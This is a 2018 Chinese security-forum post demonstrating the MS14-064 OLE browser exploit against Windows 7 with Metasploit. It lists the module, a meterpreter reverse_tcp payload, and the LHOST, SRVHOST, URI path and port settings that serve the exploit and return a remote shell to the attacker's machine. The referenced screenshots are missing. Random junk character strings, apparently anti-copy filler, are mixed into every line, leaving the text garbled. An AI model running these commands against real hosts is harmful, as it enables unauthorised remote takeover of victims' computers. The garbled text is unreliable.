找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1582|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

; o0 f3 b' W+ b. j0 J5 g 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 . @4 S) S0 a2 p: }3 A; n7 U

1 R+ M/ ]2 q3 _5 z1 m5 k+ R

+ y) o( Q1 |( r% @ 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ( X2 G, h+ g: R# x: t

" a- k: K% S2 t; R

& J% f' M5 e& L, S4 N" o 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp # Z$ b9 R' ^$ \8 K/ x

3 {9 j X# s0 J4 d1 J) D4 c, T/ W3 x

$ z/ Z) N( Z. i+ }- j' \             set AllowPowershellPrompt true0 `9 x; ~8 _. [3 }$ a" }7 ^# V

5 l' q7 h1 S5 H% B p- {* N* E r

! X, |5 |5 H6 T4 Y" z             Set LHOST 192.168.0.109% c ]: B) i( w& C6 R7 v

) r5 r% k) \ u5 D9 Q7 M

9 u; K9 [+ A. A+ O9 _; {             set SRVHOST 192.168.0.109/ j# v7 S+ r f) N/ B2 X

* _: G7 K9 z& @+ D& J6 R

5 N' n; r5 n8 L. q) O- Z, C1 R             Set uripath share 6 x- u9 I3 R6 N

. m& {, o, u1 U) n; ^" H* y

' {* U# ^" j2 E, m; | v6 d             Set srvport 80 ) f6 W- b; H- M) e/ m

. [5 g" `3 C) N: _9 [, I+ W1 @4 v

. M- j4 D7 }+ f' [- { ]   $ ]% e" x( ^ C6 Q# y% k

) G7 ^6 N! c# ?/ e0 a5 @5 W

1 L! R, S3 H2 w% y* a. K7 I- T   + W' Q- o) ~; h1 {5 Z4 n

; r: { [+ C5 v; ]& Z' d

8 S# P* B+ ?% R" e; }  # b8 P+ V0 V$ |6 C1 r7 k6 E

7 u4 R8 D4 }* a

0 N3 m: S$ @: d% A   . l: P# N7 S) X+ X3 Y( w

5 g6 @- @+ R& P

6 @/ s$ S) J5 x3 _2 X! _; }$ Z! w7 v   # u" g( y ^+ w. Z# c: ]

4 D( I, Y3 \8 y( x, n" \) _

4 [ O! O( c* n; U4 h' J _( q& a 下面我们来访问本地地址如图:# w6 B+ p: s6 w) y7 B$ i

% E, F1 }: g% ^% a" Y2 x& d* A

& `$ i0 f$ @: e  9 H' u6 y k6 J! o# H1 w

( I& i" L+ U. n, n$ z

( v: p+ s/ W, t5 x4 B1 b   7 g2 X2 _+ o9 q/ D

0 z' T, j2 C2 c: s1 P+ {

" G, _2 X% C# m2 S ) Q6 i3 O+ W2 o0 a

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表